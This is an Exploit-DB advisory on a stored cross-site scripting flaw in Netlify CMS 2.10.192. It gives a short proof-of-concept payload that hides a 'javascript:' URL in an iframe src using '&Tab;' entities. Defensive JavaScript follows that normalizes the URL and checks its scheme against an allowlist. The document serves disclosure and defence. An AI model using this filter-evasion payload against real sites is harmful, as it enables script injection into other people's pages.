Netlify CMS 2.10.192 – Stored Cross-Site Scripting (XSS)

  • Author: tmrswrr
    Date: 2023-07-11
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/51576/
  • # Exploit Title: Netlify CMS 2.10.192 - Stored Cross-Site Scripting (XSS)
    # Exploit Author: tmrswrr
    # Vendor Homepage: https://decapcms.org/docs/intro/
    # Software Link: https://github.com/decaporg/decap-cms
    # Version: 2.10.192
    # Tested on: https://cms-demo.netlify.com
    
    
    Description:
    
    1. Go to the new post page and enter the payload in the body field:
    
    https://cms-demo.netlify.com/#/collections/posts
    
    Payload = <iframe src=java&Tab;sc&Tab;ript:al&Tab;ert()></iframe>
    
    2. After saving, the XSS payload executes and an alert box appears.
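
The payload above splits the `javascript:` scheme with `&Tab;` character references: HTML decodes them to tab characters, and URL parsing removes ASCII tabs and newlines, so a literal string match on the attribute value does not see the scheme. The following is an added example, not part of the original advisory and not Decap CMS code, that normalizes a `src`/`href` value the same way before checking its scheme against an allowlist. All function names and the allowlist contents are assumptions for illustration.

```javascript
// Added example; function names are hypothetical, not Decap CMS code.
// A real sanitizer should read attribute values from an HTML parser,
// which already decodes character references.
const NAMED = { Tab: "\t", NewLine: "\n", colon: ":" };

function decodeEntities(s) {
  return s.replace(/&(?:#x([0-9a-f]+)|#(\d+)|([a-z]+));?/gi, (m, hex, dec, name) => {
    if (name) {
      // Unknown names are left untouched rather than guessed at.
      return Object.prototype.hasOwnProperty.call(NAMED, name) ? NAMED[name] : m;
    }
    const cp = hex ? parseInt(hex, 16) : parseInt(dec, 10);
    return cp <= 0x10ffff ? String.fromCodePoint(cp) : "\ufffd";
  });
}

// Mirror the URL parser's pre-processing: drop ASCII tab/newline anywhere,
// then strip leading C0 control characters and spaces.
function urlScheme(attrValue) {
  const url = decodeEntities(attrValue)
    .replace(/[\t\n\r]/g, "")
    .replace(/^[\u0000-\u0020]+/, "");
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(url);
  return m ? m[1].toLowerCase() : null; // null means a relative URL
}

// Allowlist of schemes (assumed policy); everything else is rejected.
const ALLOWED_SCHEMES = new Set(["http", "https", "mailto"]);

function isSafeUrl(attrValue) {
  const scheme = urlScheme(attrValue);
  return scheme === null || ALLOWED_SCHEMES.has(scheme);
}

// Weak check shown for comparison: matches the raw string only.
function naiveIsSafeUrl(attrValue) {
  return !attrValue.trim().toLowerCase().startsWith("javascript:");
}

// The src value of the payload quoted on this page.
const PAGE_SRC = "java&Tab;sc&Tab;ript:al&Tab;ert()";

console.log("naive check accepts:", naiveIsSafeUrl(PAGE_SRC));
console.log("normalized scheme:", urlScheme(PAGE_SRC));
console.log("allowlist check accepts:", isSafeUrl(PAGE_SRC));
```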